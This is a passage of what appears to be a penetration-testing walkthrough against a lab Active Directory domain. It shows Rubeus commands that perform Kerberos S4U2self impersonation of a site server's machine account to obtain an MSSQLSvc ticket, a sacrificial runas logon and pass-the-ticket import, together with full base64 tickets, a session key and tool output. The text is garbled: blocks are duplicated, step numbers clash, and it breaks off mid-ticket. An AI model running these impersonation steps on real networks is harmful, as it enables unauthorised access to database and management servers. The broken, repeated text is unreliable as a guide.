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
ServiceName : krbtgt/MAYYHEM.LOCAL
ServiceRealm : MAYYHEM.LOCAL
UserName : sqlsvc (NT_PRINCIPAL)
UserRealm : MAYYHEM.LOCAL
StartTime : 3/5/2024 2:52:26 AM
EndTime : 3/5/2024 12:52:26 PM
RenewTill : 3/12/2024 3:52:26 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : u39YMInwN6CIRKRoZgf7RA==
ASREP (key) : E19CCF75EE54E06B06A5907AF13CEF42
```
ServiceName : krbtgt/MAYYHEM.LOCAL
ServiceRealm : MAYYHEM.LOCAL
UserName : sqlsvc (NT_PRINCIPAL)
UserRealm : MAYYHEM.LOCAL
StartTime : 3/5/2024 2:52:26 AM
EndTime : 3/5/2024 12:52:26 PM
RenewTill : 3/12/2024 3:52:26 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : u39YMInwN6CIRKRoZgf7RA==
ASREP (key) : E19CCF75EE54E06B06A5907AF13CEF42
```
8. Get a TGS for the MSSQLSvc SPN using S4U2self, impersonating the primary site server:
9. Get a TGS for the MSSQLSvc SPN using S4U2self, impersonating the primary site server:
```
Rubeus.exe s4u /impersonateuser:SITE-SERVER$ /altservice:MSSQLSvc/SITE3-DB.MAYYHEM.LOCAL:1433 /self /nowrap /ticket:doIFdDCCBXCgAwIBBaEDAgEWooIEiDCCBIRhggSAMIIEfKADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU1BWVlIRU0uTE9DQUyjggQ+MIIEOqADAgESoQMCAQKiggQsBIIEKLdcg3OmG5/v47h/u/swmeirjidkQJ8ndXG8ENds+MKZLhiKqcT1Q8o37wuZupaj8UZPgIDcwGlXi1cYrnFfvnQvZ8/EWTgMMs9ajk3eDcmyOBINC3mqDy6Cwwfm4jPuuxJpGUVgfBz6j0jabjAXhP0xZfHeBWa+ABUROtQIeaJ5sNT8BJat1nMVi97vBiC9Rxh8JfKypGTqXrcuhaaBmWquTb5I/+2tYfP03Sb22ddfIIKf2dUSf9rjuof6ttlmjrWgtDB8dkGCZYXzghkVCNZ0Jesag2qILMoOBjIDx4I2ijk88iNQmBjOgwJuhRmKoRYZAV03damrWzdY6sWCKtRlMagvOdWwz0NsX3nyV7NR5HSuKXIQzgRWeBYXgHrbEQgB8ga6b2yCOR6cNMuncTRTpkt91tHy7eLBtCHtVeBSTQyxojgKyVvcP2qP++RquYxQ/eOCOIjtp/wSopcudCA447Bm62/JxV3+VMXBvMviPZg0i+rQEgNyfdkE6ZThVRw3hk2oeLij+tCLqN7CPZ5fvbg4Petr3HLtEX7OH0v0xcjBxPGAsgAEh4iarhvkOHDJXrgbvj+40M1Gd3xfiBPXvcp7Lek3ndseuGdUA8B0iy+4QKNVmbkZubJ2OJVhmWJX9WbufcW/nIgh5KTX2RjU4d7clCxc8Zv0ZsjumtSSZHfRKjw3jRUBfjXLAwslMYM7HwwZCpp/+GXZduG8VewugrrUO6DGj87vGohpttjYeCH3+EN/uOOt0Xtz8DbfREwb1OKpS4bstWdyAyzrJm0BLY0Dr0XgG7wcz1WTJ5DWr2h6jHlYsWo4FWNNpB7kmVVhZz18hf+mB75/bqXhgRR4ja4xkqYk0KOHnUijgHxq2SNPW+XIIElnz2+ret/MsWiwq1wQz1WJjfHETgwcc1uMVL33yvwa7zyXpxGu0jl7m38mhZcuV1tR7Zm96y+s+Qg38M4AHNh+peu/EC55/EKrDX4g1hHrKvqMGfaO7QL39yQnYM/S90xoUDTZ7cKXQnRBeZZBRKCs/gEr8OnAqCqzXK39CbfOmtxGk2gi2ThB58Ptor1sc0U6hxvbfJi4M15N87zL2tjgepRqNOpudWB8yPqjhzca+hP/bvvSn7ks4zgS8H/kqzfSFL3TKEJhifkjpT3fQCxg4PMeSmyBZjj9QpOMCapn1QiSTYmMEqDCF5PU0kwEgFrxtEc5W+aUNbr6GLtwgC7GID92oySq1dMDgLyEanX4wsY1SQO7LHK+Iurr1DTLk5Qhc8ZW6kl+XvgEOoib/Dekhje++nnHuXuimNRbFjllJ4m0N8AbMY/3D4HDc3TWbxcUg/8lid3LQe/Mr3cqAGJjBzIXqelfLRtv7O438ffE6phoNcY2u1EyFY75ObXsiIkRBpuhWhkhvQvu/lGiH1k1o4HXMIHUoAMCAQCigcwEgcl9gcYwgcOggcAwgb0wgbqgGzAZoAMCARehEgQQu39YMInwN6CIRKRoZgf7RKEPGw1NQVlZSEVNLkxPQ0FMohMwEaADAgEBoQowCBsGc3Fsc3ZjowcDBQBA4QAApREYDzIwMjQwMzA1MTA1MjI2WqYRGA8yMDI0MDMwNTIwNTIyNlqnERgPMjAyNDAzMTIxMDUyMjZaqA8bDU1BWVlIRU0uTE9DQUypIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU1BWVlIRU0uTE9DQUw=
```
Rubeus.exe s4u /impersonateuser:SITE-SERVER$ /altservice:MSSQLSvc/SITE3-DB.MAYYHEM.LOCAL:1433 /self /nowrap /ticket:doIFdDCCBXCgAwIBBaEDAgEWooIEiDCCBIRhggSAMIIEfKADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU1BWVlIRU0uTE9DQUyjggQ+MIIEOqADAgESoQMCAQKiggQsBIIEKLdcg3OmG5/v47h/u/swmeirjidkQJ8ndXG8ENds+MKZLhiKqcT1Q8o37wuZupaj8UZPgIDcwGlXi1cYrnFfvnQvZ8/EWTgMMs9ajk3eDcmyOBINC3mqDy6Cwwfm4jPuuxJpGUVgfBz6j0jabjAXhP0xZfHeBWa+ABUROtQIeaJ5sNT8BJat1nMVi97vBiC9Rxh8JfKypGTqXrcuhaaBmWquTb5I/+2tYfP03Sb22ddfIIKf2dUSf9rjuof6ttlmjrWgtDB8dkGCZYXzghkVCNZ0Jesag2qILMoOBjIDx4I2ijk88iNQmBjOgwJuhRmKoRYZAV03damrWzdY6sWCKtRlMagvOdWwz0NsX3nyV7NR5HSuKXIQzgRWeBYXgHrbEQgB8ga6b2yCOR6cNMuncTRTpkt91tHy7eLBtCHtVeBSTQyxojgKyVvcP2qP++RquYxQ/eOCOIjtp/wSopcudCA447Bm62/JxV3+VMXBvMviPZg0i+rQEgNyfdkE6ZThVRw3hk2oeLij+tCLqN7CPZ5fvbg4Petr3HLtEX7OH0v0xcjBxPGAsgAEh4iarhvkOHDJXrgbvj+40M1Gd3xfiBPXvcp7Lek3ndseuGdUA8B0iy+4QKNVmbkZubJ2OJVhmWJX9WbufcW/nIgh5KTX2RjU4d7clCxc8Zv0ZsjumtSSZHfRKjw3jRUBfjXLAwslMYM7HwwZCpp/+GXZduG8VewugrrUO6DGj87vGohpttjYeCH3+EN/uOOt0Xtz8DbfREwb1OKpS4bstWdyAyzrJm0BLY0Dr0XgG7wcz1WTJ5DWr2h6jHlYsWo4FWNNpB7kmVVhZz18hf+mB75/bqXhgRR4ja4xkqYk0KOHnUijgHxq2SNPW+XIIElnz2+ret/MsWiwq1wQz1WJjfHETgwcc1uMVL33yvwa7zyXpxGu0jl7m38mhZcuV1tR7Zm96y+s+Qg38M4AHNh+peu/EC55/EKrDX4g1hHrKvqMGfaO7QL39yQnYM/S90xoUDTZ7cKXQnRBeZZBRKCs/gEr8OnAqCqzXK39CbfOmtxGk2gi2ThB58Ptor1sc0U6hxvbfJi4M15N87zL2tjgepRqNOpudWB8yPqjhzca+hP/bvvSn7ks4zgS8H/kqzfSFL3TKEJhifkjpT3fQCxg4PMeSmyBZjj9QpOMCapn1QiSTYmMEqDCF5PU0kwEgFrxtEc5W+aUNbr6GLtwgC7GID92oySq1dMDgLyEanX4wsY1SQO7LHK+Iurr1DTLk5Qhc8ZW6kl+XvgEOoib/Dekhje++nnHuXuimNRbFjllJ4m0N8AbMY/3D4HDc3TWbxcUg/8lid3LQe/Mr3cqAGJjBzIXqelfLRtv7O438ffE6phoNcY2u1EyFY75ObXsiIkRBpuhWhkhvQvu/lGiH1k1o4HXMIHUoAMCAQCigcwEgcl9gcYwgcOggcAwgb0wgbqgGzAZoAMCARehEgQQu39YMInwN6CIRKRoZgf7RKEPGw1NQVlZSEVNLkxPQ0FMohMwEaADAgEBoQowCBsGc3Fsc3ZjowcDBQBA4QAApREYDzIwMjQwMzA1MTA1MjI2WqYRGA8yMDI0MDMwNTIwNTIyNlqnERgPMjAyNDAzMTIxMDUyMjZaqA8bDU1BWVlIRU0uTE9DQUypIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU1BWVlIRU0uTE9DQUw=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
v2.3.0
[*] Action: S4U
[*] Action: S4U
[*] Action: S4U
[*] Action: S4U
[*] Building S4U2self request for: 'sqlsvc@MAYYHEM.LOCAL'
[*] Using domain controller: DC.MAYYHEM.LOCAL (192.168.57.100)
[*] Sending S4U2self request to 192.168.57.100:88
[+] S4U2self success!
[*] Substituting alternative service name 'MSSQLSvc/SITE3-DB.MAYYHEM.LOCAL:1433'
[*] Got a TGS for 'SITE-SERVER$' to 'MSSQLSvc@MAYYHEM.LOCAL'
[*] base64(ticket.kirbi):
[*] Building S4U2self request for: 'sqlsvc@MAYYHEM.LOCAL'
[*] Using domain controller: DC.MAYYHEM.LOCAL (192.168.57.100)
[*] Sending S4U2self request to 192.168.57.100:88
[+] S4U2self success!
[*] Substituting alternative service name 'MSSQLSvc/SITE3-DB.MAYYHEM.LOCAL:1433'
[*] Got a TGS for 'SITE-SERVER$' to 'MSSQLSvc@MAYYHEM.LOCAL'
[*] base64(ticket.kirbi):
doIFnDCCBZigAwIBBaEDAgEWooIEmjCCBJZhggSSMIIEjqADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMzo4IEQDCCBDygAwIBF6EDAgECooIELgSCBCrQ0fgxcYKC86CoZYKnW00ZNLJRl2Vfn9hFIkkTwXzcRF7hyESIYvUkJqjtmm0butbj1+IxrfL9je7iAXV4i2peWLEMEZcVnCzNo88e/Wg/BSLiGYH3VMkn5+r43TlY8RWBZ4MD9yFFxkO/Bw7j7NSzL8itXIHOeEgAM/W2lv4SneurG8oKrp/yld9aTs1aRWXIghXYq8DqPz1s26TcXL4hkgsYDXp1vMTHsbM7SihTXIHjZw67EFZe4fJ4tT4fj2XLc3VSLFAtegHz/Pn1yVEJkcFmhHQv2JTr7bsjRLFr9vlUOW56dwocBnS4Iie8KrNSJ9vOCMXzpMTbFv+V8VxECsXNWyT6APsRFyK4FUegK5I0eQQVBDdsqYpahIBtDSA4UcJMTQxNyXvrsIZRYgnYzE+bDhEFoOKiAtTQaIvGUsTAcJjnqs1uQObE2dAORa3jbR/DQb/NVs3v48AF67NMSAdnR7Ff9H72tuw0Mhz3CNpnDy5s5XXQNnXHlkWyA4xyV3+dv3qcxEwvwtEppzKt6zpSO9d0Aohpl71zhuaV/APf9uavdKQ12I+Pd2xmuSoMaKpedl5odRX6sj2enpThmXYRMlwGh5g+wnnLBp321Y5WvrPE4gNtH4nTgG6f8T8W2joVSe0vZLgzaPlDhWOVsB1urd+hrLoZAAqnlvMxJS5Ph1z2iTRTjGfG41UudK/xiomFnJoTmpbtzXy+gNlXjI7mlPDqDFQfco690M/lSpm9zxTlLJihLDfSicRFB8LaB1Is4On6To5YELcGIFzTPsIcIIYXK+jJKTSLLhOueHLpsNzUWoq93PxbeR9MgUGVH9220DXl9dRnT7Eux3GQmVGj4UL4pIOHfGTYqvv9Xr3rlaHbCbTwB4QKT4lmz6Kf5Wq1rtBeh91lbNV4EwbboUXujbXK1dm7w1DHApeBgXRxWeYNgns0jQ6ZTj3GTQL8XOLhpBHPZeqnekIKrGnVZx4GmpmINNIs+7d8ytqVovx9wXJp4/5kqUWAFshf3dAAMKlH8OGUHzcpfpNzLviL+m53mmx0PPCWlBqpgArfABkcxjdyd3qPzmZzKCGCyk8c258tGRsDC0YD1yRKPQfntnQ+F71W1c9I/8aknUpN7W0x896/CBuDGIe88B9neO8XJwbAQgqMRJAzIqn5YjoFfNlbMt8QN4pVx6POJPbKP95Mctn+6Bgcx9lvksBDGxR1VBimFMcxqQtvJe+BgFGZzQKtSuz4onuuj8DnC/Nk9JvhQQP5805dV7JJq2URLWrwjpUrUtH41vKqu0n1Iyh8GB7czRogdjzeCPnQ1XTOdO2Kml9garo2CqVw5sZfWk3W2veaMmapw5og4Nv745nG/Xx2WXeNHK3MmJctl6hHLC90vn0948LuDlHq2X+M3kDYyY5fmNBivVPso4HtMIHqoAMCAQCigeIEgd99gdwwgdmggdYwgdMwgdCgGzAZoAMCARehEgQQoAiJugdRRTbS5gjvJ92UA6EPGw1NQVlZSEVNLkxPQ0FMohkwF6ADAgEKoRAwDhsMU0lURS1TRVJWRVIkowcDBQBAoQAApREYDzIwMjQwMzA1MTA1MjQ4WqYRGA8yMDI0MDMwNTIwNTIyNlqnERgPMjAyNDAzMTIxMDUyMjZaqA8bDU1BWVlIRU0uTE9DQUypMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMz
```
doIFnDCCBZigAwIBBaEDAgEWooIEmjCCBJZhggSSMIIEjqADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMzo4IEQDCCBDygAwIBF6EDAgECooIELgSCBCrQ0fgxcYKC86CoZYKnW00ZNLJRl2Vfn9hFIkkTwXzcRF7hyESIYvUkJqjtmm0butbj1+IxrfL9je7iAXV4i2peWLEMEZcVnCzNo88e/Wg/BSLiGYH3VMkn5+r43TlY8RWBZ4MD9yFFxkO/Bw7j7NSzL8itXIHOeEgAM/W2lv4SneurG8oKrp/yld9aTs1aRWXIghXYq8DqPz1s26TcXL4hkgsYDXp1vMTHsbM7SihTXIHjZw67EFZe4fJ4tT4fj2XLc3VSLFAtegHz/Pn1yVEJkcFmhHQv2JTr7bsjRLFr9vlUOW56dwocBnS4Iie8KrNSJ9vOCMXzpMTbFv+V8VxECsXNWyT6APsRFyK4FUegK5I0eQQVBDdsqYpahIBtDSA4UcJMTQxNyXvrsIZRYgnYzE+bDhEFoOKiAtTQaIvGUsTAcJjnqs1uQObE2dAORa3jbR/DQb/NVs3v48AF67NMSAdnR7Ff9H72tuw0Mhz3CNpnDy5s5XXQNnXHlkWyA4xyV3+dv3qcxEwvwtEppzKt6zpSO9d0Aohpl71zhuaV/APf9uavdKQ12I+Pd2xmuSoMaKpedl5odRX6sj2enpThmXYRMlwGh5g+wnnLBp321Y5WvrPE4gNtH4nTgG6f8T8W2joVSe0vZLgzaPlDhWOVsB1urd+hrLoZAAqnlvMxJS5Ph1z2iTRTjGfG41UudK/xiomFnJoTmpbtzXy+gNlXjI7mlPDqDFQfco690M/lSpm9zxTlLJihLDfSicRFB8LaB1Is4On6To5YELcGIFzTPsIcIIYXK+jJKTSLLhOueHLpsNzUWoq93PxbeR9MgUGVH9220DXl9dRnT7Eux3GQmVGj4UL4pIOHfGTYqvv9Xr3rlaHbCbTwB4QKT4lmz6Kf5Wq1rtBeh91lbNV4EwbboUXujbXK1dm7w1DHApeBgXRxWeYNgns0jQ6ZTj3GTQL8XOLhpBHPZeqnekIKrGnVZx4GmpmINNIs+7d8ytqVovx9wXJp4/5kqUWAFshf3dAAMKlH8OGUHzcpfpNzLviL+m53mmx0PPCWlBqpgArfABkcxjdyd3qPzmZzKCGCyk8c258tGRsDC0YD1yRKPQfntnQ+F71W1c9I/8aknUpN7W0x896/CBuDGIe88B9neO8XJwbAQgqMRJAzIqn5YjoFfNlbMt8QN4pVx6POJPbKP95Mctn+6Bgcx9lvksBDGxR1VBimFMcxqQtvJe+BgFGZzQKtSuz4onuuj8DnC/Nk9JvhQQP5805dV7JJq2URLWrwjpUrUtH41vKqu0n1Iyh8GB7czRogdjzeCPnQ1XTOdO2Kml9garo2CqVw5sZfWk3W2veaMmapw5og4Nv745nG/Xx2WXeNHK3MmJctl6hHLC90vn0948LuDlHq2X+M3kDYyY5fmNBivVPso4HtMIHqoAMCAQCigeIEgd99gdwwgdmggdYwgdMwgdCgGzAZoAMCARehEgQQoAiJugdRRTbS5gjvJ92UA6EPGw1NQVlZSEVNLkxPQ0FMohkwF6ADAgEKoRAwDhsMU0lURS1TRVJWRVIkowcDBQBAoQAApREYDzIwMjQwMzA1MTA1MjQ4WqYRGA8yMDI0MDMwNTIwNTIyNlqnERgPMjAyNDAzMTIxMDUyMjZaqA8bDU1BWVlIRU0uTE9DQUypMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMz
```
9. Start a sacrificial logon session for the Kerberos ticket:
```
runas /netonly /user:asdf powershell
Enter the password for asdf:
Attempting to start powershell as user "CLIENT\asdf" ...
```
10. Start a sacrificial logon session for the Kerberos ticket:
```
runas /netonly /user:asdf powershell
Enter the password for asdf:
Attempting to start powershell as user "CLIENT\asdf" ...
```
10. Import the ticket into the sacrificial logon session:
11. Import the ticket into the sacrificial logon session:
```
Rubeus.exe ptt /ticket:doIFnDCCBZigAwIBBaEDAgEWooIEmjCCBJZhggSSMIIEjqADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMzo4IEQDCCBDygAwIBF6EDAgECooIELgSCBCrQ0fgxcYKC86CoZYKnW00ZNLJRl2Vfn9hFIkkTwXzcRF7hyESIYvUkJqjtmm0butbj1+IxrfL9je7iAXV4i2peWLEMEZcVnCzNo88e/Wg/BSLiGYH3VMkn5+r43TlY8RWBZ4MD9yFFxkO/Bw7j7NSzL8itXIHOeEgAM/W2lv4SneurG8oKrp/yld9aTs1aRWXIghXYq8DqPz1s26TcXL4hkgsYDXp1vMTHsbM7SihTXIHjZw67EFZe4fJ4tT4fj2XLc3VSLFAtegHz/Pn1yVEJkcFmhHQv2JTr7bsjRLFr9vlUOW56dwocBnS4Iie8KrNSJ9vOCMXzpMTbFv+V8VxECsXNWyT6APsRFyK4FUegK5I0eQQVBDdsqYpahIBtDSA4UcJMTQxNyXvrsIZRYgnYzE+bDhEFoOKiAtTQaIvGUsTAcJjnqs1uQObE2dAORa3jbR/DQb/NVs3v48AF67NMSAdnR7Ff9H72tuw0Mhz3CNpnDy5s5XXQNnXHlkWyA4xyV3+dv3qcxEwvwtEppzKt6zpSO9d0Aohpl71zhuaV/APf9uavdKQ12I+Pd2xmuSoMaKpedl5odRX6sj2enpThmXYRMlwGh5g+wnnLBp321Y5WvrPE4gNtH4nTgG6f8T8W2joVSe0vZLgzaPlDhWOVsB1urd+hrLoZAAqnlvMxJS5Ph1z2iTRTjGfG41UudK/xiomFnJoTmpbtzXy+gNlXjI7mlPDqDFQfco690M/lSpm9zxTlLJihLDfSicRFB8LaB1Is4On6To5YELcGIFzTPsIcIIYXK+jJKTSLLhOueHLpsNzUWoq93PxbeR9MgUGVH9220DXl9dRnT7Eux3GQmVGj4UL4pIOHfGTYqvv9Xr3rlaHbCbTwB4QKT4lmz6Kf5Wq1rtBeh91lbNV4EwbboUXujbXK1dm7w1DHApeBgXRxWeYNgns0jQ6ZTj3GTQL8XOLhpBHPZeqnekIKrGnVZx4GmpmINNIs+7d8ytqVovx9wXJp4/5kqUWAFshf3dAAMKlH8OGUHzcpfpNzLviL+m53mmx0PPCWlBqpgArfABkcxjdyd3qPzmZzKCGCyk8c258tGRsDC0YD1yRKPQfntnQ+F71W1c9I/8aknUpN7W0x896/CBuDGIe88B9neO8XJwbAQgqMRJAzIqn5YjoFfNlbMt8QN4pVx6POJPbKP95Mctn+6Bgcx9lvksBDGxR1VBimFMcxqQtvJe+BgFGZzQKtSuz4onuuj8DnC/Nk9JvhQQP5805dV7JJq2URLWrwjpUrUtH41vKqu0n1Iyh8GB7czRogdjzeCPnQ1XTOdO2Kml9garo2CqVw5sZfWk3W2veaMmapw5og4Nv745nG/Xx2WXeNHK3MmJctl6hHLC90vn0948LuDlHq2X+M3kDYyY5fmNBivVPso4HtMIHqoAMCAQCigeIEgd99gdwwgdmggdYwgdMwgdCgGzAZoAMCARehEgQQoAiJugdRRTbS5gjvJ92UA6EPGw1NQVlZSEVNLkxPQ0FMohkwF6ADAgEKoRAwDhsMU0lURS1TRVJWRVIkowcDBQBAoQAApREYDzIwMjQwMzA1MTA1MjQ4WqYRGA8yMDI0MDMwNTIwNTIyNlqnERgPMjAyNDAzMTIxMDUyMjZaqA8bDU1BWVlIRU0uTE9DQUypMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMz
```
Rubeus.exe ptt /ticket:doIFnDCCBZigAwIBBaEDAgEWooIEmjCCBJZhggSSMIIEjqADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiMjAwoAMCAQGhKTAnGwhNU1NRTFN2YxsbU0lURTMtREIuTUFZWUhFTS5MT0NBTDoxNDMzo4IEQDCCBDygAwIBF6EDAgECooIELgSCBCrQ0fgxcYKC86CoZYKnW00ZNLJRl2Vfn9hFIkkTwXzcRF7hyESIYvUkJqjtmm0butbj1+IxrfL9je7iAXV4i2peWLEMEZcVnCzNo88e/Wg/BSLiGYH3VMkn5+r43TlY8RWBZ4MD9yFFxkO/Bw7j7NSzL8itXIHOeEgAM/W2lv4SneurG8oKrp/yld9aTs1aRWXIghXYq8DqPz1s26TcXL4hkgsYDXp1vMTHsbM7SihTXIHjZw67EFZe4fJ4tT4fj2XLc3VSLFAtegHz/Pn1yVEJkcFmhHQv2JTr7bsjRLFr9vlUOW56dwocBnS4Iie8KrNSJ9vOCMXzpMTbFv+V8VxECsXNWyT6APsRFyK4FUegK5I0eQQVBDdsqYpahIBtDSA4UcJMTQxNyXvrsIZRYgnYzE+bDhEFoOKiAtTQaIvGUsTAcJjnqs1uQObE2dAORa3jbR/DQb/NVs3v48AF67NMSAdnR7Ff9H72tuw0Mhz3CNpnDy5s5XXQNnXHlkWyA4xyV3+dv3qcxEwvwtEppzKt6zpSO9d0Aohpl71zhuaV/APf9uavdKQ12I+Pd2xmuSoMaKpedl5odRX6sj2enpThmXYRMlwGh5g+wnnLBp321Y5WvrPE4gNtH4nTgG6f8T8W2joVSe0vZLgzaPlDhWOVsB1urd+hrLoZAAqnlvMxJS5Ph1z2iTRTjGfG41UudK/xiomFnJoTmpbtzXy+gNlXjI7mlPDqDFQfco690M/lSpm9zxTlLJihLDfSicRFB8LaB1Is4On6To5YELcGIFzTPsIcIIYXK+jJKTSLLhOueHLpsNzUWoq93PxbeR9MgUGVH9220DXl9dRnT7Eux3GQmVGj4UL4pIOHfGTYqvv9Xr3rlaHbCbTwB4QKT4lmz6Kf5Wq1rtBeh91lbNV4EwbboUXujbXK1dm7w1DHApeBgXRxWeYNgns0jQ6ZTj3GTQL8XOLhpBHPZeqnekIKrGnVZx4GmpmINNIs+7d8ytqVovx9wXJp4/5kqUWAFshf3dAAMKlH8OGUHzcpfpNzLviL+m53mmx0PPCWlBqpgArfABkcxjdyd3qPzmZzKCGCyk8c258tGRsDC0YD1yRKPQfntnQ+F71W1c9I/8aknUpN7W0x896/CBuDGIe88B9neO8XJwbAQgqMRJAzIqn5YjoFfNlbMt8QN4pVx6POJPbKP95Mctn+6Bgcx9lvksBDGxR1VBimFMcxqQtvJe+BgFGZzQKtSuz4onuuj8DnC/Nk9JvhQQP5805dV7JJq2URLWrwjpUrUtH41vKqu0n1Iyh8GB7czRogdjzeCPnQ1XTOdO2Kml9garo2CqVw5sZfWk3W2veaMmapw5og4Nv745nG/Xx2WXeNHK3MmJctl6hHLC90vn0948LuDlHq2X+M3kDYyY5fmNBivVPso4HtMIHqoAMCAQCigeIEgd99gdwwgdmggdYwgdMwgdCgGzAZoAMCARehEgQQoAiJugdRRTbS5gjvJ92UA6EPGw1NQVlZSEVNLkxPQ0FMohkwF6ADAgEKoRAwDhsMU0lU